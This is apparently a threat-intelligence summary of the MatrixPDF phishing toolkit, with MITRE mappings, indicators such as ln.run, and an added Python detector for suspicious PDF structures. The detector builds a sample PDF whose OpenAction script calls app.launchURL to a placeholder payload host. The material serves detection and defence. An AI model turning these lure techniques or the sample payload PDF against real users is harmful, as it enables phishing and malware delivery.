MatrixPDF is a toolkit that transforms legitimate PDF files into interactive phishing and malware delivery tools by adding overlays, clickable prompts, and embedded JavaScript that redirect victims to attacker-controlled payloads. The toolkit exploits email PDF preview behavior and PDF scripting (e.g., app.launchURL) to bypass scanning and initiate downloads, often using short or legitimate-looking domains like ln.run. #MatrixPDF #ln.run
Keypoints
- MatrixPDF is a builder that modifies genuine PDF documents with social-engineering elements (fake “Secure Document” prompts, custom icons, and content blur) to lure victims.
- The toolkit can embed JavaScript and clickable annotations to open external payload URLs or execute actions when the PDF is opened or clicked.
- Method 1 abuses email PDF preview (e.g., Gmail) by using clickable overlays that open external sites, bypassing in-email malware scanning because no binary payload is contained in the PDF.
- Method 2 inserts document-level JavaScript (e.g., app.launchURL or form actions) that triggers downloads when the PDF is opened in readers that allow script execution and the user consents.
- Attackers often host payloads behind innocuous-looking short domains (example: ln.run) or public hosting, making detection and user suspicion less likely.
- Successful delivery relies on social engineering (users clicking “Open Secure Document” or granting permission to connect), splitting detection between email scanning and browser or OS download controls.
- AI-driven email security can detect these attacks by analyzing PDF structure and behavior, extracting and sandboxing embedded URLs, and simulating actions to reveal redirects and script-driven payload retrieval.
MITRE Techniques
- [T1204] User Execution – MatrixPDF uses social-engineering overlays and prompts like “Open Secure Document” to trick users into clicking or allowing actions that lead to payload retrieval. Quote: ‘…an overlay prompts the user to “Open Secure Document.”’
- [T1205] Traffic Signaling – Embedded clickable links/annotations in PDFs open external payload URLs in the victim’s browser, signaling to attacker-controlled sites after a user-initiated action. Quote: ‘…the button press simply opens an external site in the user’s browser.’
- [T1027] Obfuscated Files or Information – PDFs are modified with blurred content and overlays to conceal true intent and hide embedded scripts or links until user interaction. Quote: ‘…content blurring, and redirects. To the recipient, the file looks routine…’
- [T1105] Ingress Tool Transfer – The PDF initiates downloads from external URLs (e.g., putty.exe as a stand-in) to transfer malware to the victim’s system. Quote: ‘…the PDF’s embedded link points to a download for PuTTY…this download is a stand-in for a malware payload.’
- [T1203] Exploitation for Client Execution – Document-level JavaScript (e.g., app.launchURL or form submission actions) is used to execute actions when a PDF is opened, potentially triggering external connections and downloads. Quote: ‘…this might be implemented via an Acrobat JavaScript API call (e.g., app.launchURL()) that initiates a download.’
Indicators of Compromise
- [Domain] Hosted payload or redirect domains – ln.run (short URL used to fetch payload), and public hosting domains used to serve files like putty.exe.
- [File name] Malicious or masqueraded executables – putty.exe used as a stand-in for a malware payload (attacker-controlled executable).
- [Artifact] PDF behaviors and objects – blurred content overlays and “Open Secure Document” annotation/buttons observed in malicious PDFs (indicator of manipulated PDF structure).
- [Technique] Embedded JavaScript API calls in PDFs – references to app.launchURL or document-level scripts that fetch external content (observed in malicious PDF scripts).
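The detection approach described under Keypoints (analyzing PDF structure, extracting embedded URLs) and the PDF-level indicators listed above (clickable /URI annotations for the preview overlay, document-level JavaScript and app.launchURL calls for the on-open download) can both be checked with a static triage pass over the file. The script below is an added example written for this summary; it is not Varonis code and not part of MatrixPDF. Everything in it is an assumption of the example: the keyword set, the scoring thresholds, the helper names (scan_pdf, build_sample) and the constructed sample PDF, whose URLs are placeholders (the ln.run path is invented). It inflates FlateDecode streams and decodes #XX escapes in PDF name tokens before matching, so that the script text and hooks are actually seen rather than only the outer dictionaries.

```python
import re
import zlib

# Name tokens (/JavaScript, /OpenAction, ...) may be written with #XX hex escapes,
# which PDF syntax permits; decoding them before matching avoids a trivial miss.
_NAME_TOKEN = re.compile(rb"/[^\s/<>\[\]()]*")
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
# stream ... endstream bodies; Flate-compressed content is inflated before matching.
# The lookbehind stops "endstream" from being mistaken for the start of a stream.
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)
_URL = re.compile(rb"https?://[^\s\"'<>()]+")
_LAUNCH_CALL = re.compile(rb"app\.launchURL\s*\(")


def _decode_names(body: bytes) -> bytes:
    """Decode #XX escapes inside PDF name tokens only; strings and URLs are untouched."""
    def fix(m):
        return _HEX_ESCAPE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(0))
    return _NAME_TOKEN.sub(fix, body)


def _normalize(data: bytes) -> bytes:
    """Raw bytes plus the inflated content of every Flate-compressed stream."""
    parts = [data]
    for m in _STREAM.finditer(data):
        try:
            parts.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # uncompressed, another filter, or damaged: the raw bytes are still scanned
    return _decode_names(b"\n".join(parts))


def scan_pdf(data: bytes) -> dict:
    """Static triage of one PDF: which scripting/action hooks are present, which URLs
    it points at, and a coarse verdict. Weights and thresholds are this example's own."""
    body = _normalize(data)
    f = {
        # document-level or action JavaScript (Method 2 in the summary)
        "has_javascript": re.search(rb"/(JavaScript|JS)\b", body) is not None,
        # actions fired when the document is opened or on other document events
        "has_open_action": re.search(rb"/(OpenAction|AA)\b", body) is not None,
        # clickable link/launch actions, the hook behind the preview overlay (Method 1)
        "has_launch_or_uri": re.search(rb"/(Launch|URI)\b", body) is not None,
        "launch_url_calls": len(_LAUNCH_CALL.findall(body)),
        "urls": sorted({u.decode("latin-1") for u in _URL.findall(body)}),
    }
    score = 0
    score += 2 if f["has_javascript"] else 0
    score += 2 if f["has_open_action"] else 0
    score += 2 if f["launch_url_calls"] else 0
    score += 1 if f["has_launch_or_uri"] else 0
    score += 1 if f["urls"] else 0
    f["score"] = score
    f["verdict"] = "suspicious" if score >= 4 else "review" if score >= 2 else "clean"
    return f


def build_sample() -> bytes:
    """Constructed minimal PDF fragment (not a real MatrixPDF sample): a catalog whose
    OpenAction runs a Flate-compressed script, plus one link annotation.
    Both URLs are placeholders invented for this example."""
    js = b'app.launchURL("https://payload.example.invalid/secure-doc", true);'
    stream = zlib.compress(js)
    return (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(stream)).encode() + b" /Filter /FlateDecode >>\n"
        b"stream\n" + stream + b"\nendstream\nendobj\n"
        b"5 0 obj << /Type /Annot /Subtype /Link /A << /S /URI /URI (https://ln.run/placeholder-id) >> >> endobj\n"
        b"%%EOF\n"
    )


if __name__ == "__main__":
    for key, value in scan_pdf(build_sample()).items():
        print(f"{key}: {value}")
```

Run against the constructed sample, the scan reports JavaScript, an OpenAction, a /URI link, one app.launchURL call and both URLs, and rates the file suspicious; a link-only PDF lands in "review", which matches the summary's point that Method 1 carries no script or binary and must be judged by where its URL leads. This regex pass is a first-stage filter, not a parser: objects packed into compressed object streams, encrypted files, non-Flate filters, or script that assembles its URL at run time will get past it, which is why the page pairs structural analysis with URL extraction, sandboxing and action simulation.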
Read more: https://www.varonis.com/blog/matrixpdf